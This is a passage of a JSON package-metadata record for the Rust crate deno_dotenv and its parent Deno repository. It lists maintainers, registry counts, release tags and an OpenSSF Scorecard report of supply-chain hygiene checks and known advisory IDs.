Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:35.146Z","updated_at":"2022-11-07T18:29:35.146Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.865Z","updated_at":"2023-07-18T22:41:28.865Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":13868084,"name":"deno_dotenv","ecosystem":"cargo","description":"dotenv file parser for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":27,"first_release_published_at":"2026-02-20T15:43:42.347Z","latest_release_published_at":"2026-08-27T15:21:29.710Z","latest_release_number":"0.27.0","last_synced_at":"2026-09-07T22:57:04.262Z","created_at":"2026-02-20T15:47:25.097Z","updated_at":"2026-09-07T22:57:04.263Z","registry_url":"https://crates.io/crates/deno_dotenv/","install_command":"cargo install deno_dotenv","documentation_url":"https://docs.rs/deno_dotenv/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":